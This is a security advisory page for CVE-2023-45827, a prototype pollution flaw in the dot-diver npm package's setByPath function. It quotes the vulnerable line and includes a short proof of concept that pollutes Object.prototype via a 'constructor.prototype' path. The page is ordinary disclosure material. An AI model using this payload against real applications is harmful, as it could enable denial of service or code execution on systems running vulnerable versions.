Ecosyste.ms: Advisories

Security Advisories: GSA_kwCzR0hTQS05dzVmLW13M3AtcGo0N84AA26p

Prototype Pollution(PP) vulnerability in setByPath

Summary

There is a Prototype Pollution(PP) vulnerability in dot-diver. It can leads to RCE.

Details

//https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277

// eslint-disable-next-line @typescript-eslint/no-unsafe-member-access
  objectToSet[lastKey] = value

In this code, there is no validation for Prototpye Pollution.

PoC

import { getByPath, setByPath } from '@clickbar/dot-diver'

console.log({}.polluted); // undefined
setByPath({},'constructor.prototype.polluted', 'foo');
console.log({}.polluted); // foo

Impact

It is Prototype Pollution(PP) and it can leads to Dos, RCE, etc.

Credits

Team : NodeBoB

최지혁 ( Jihyeok Choi )

이동하 ( Lee Dong Ha of ZeroPointer Lab )

강성현    ( kang seonghyeun )

박성진    ( sungjin park )

김찬호    ( Chanho Kim )

이수영    ( Lee Su Young )

김민욱    ( MinUk Kim )

Permalink: https://github.com/advisories/GHSA-9w5f-mw3p-pj47
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05dzVmLW13M3AtcGo0N84AA26p
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: about 1 year ago
Updated: about 1 year ago

CVSS Score: 7.3
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

EPSS Percentage: 0.00533
EPSS Percentile: 0.77664

Identifiers: GHSA-9w5f-mw3p-pj47, CVE-2023-45827
References:

• https://github.com/clickbar/dot-diver/security/advisories/GHSA-9w5f-mw3p-pj47
• https://github.com/clickbar/dot-diver/commit/9790834cf4c2bca75db00e588e58056dacaf602f
• https://nvd.nist.gov/vuln/detail/CVE-2023-45827
• https://github.com/clickbar/dot-diver/commit/98daf567390d816fd378ec998eefe2e97f293d5a
• https://github.com/advisories/GHSA-9w5f-mw3p-pj47

Repository: https://github.com/clickbar/dot-diver
Blast Radius: 0.0

Affected Packages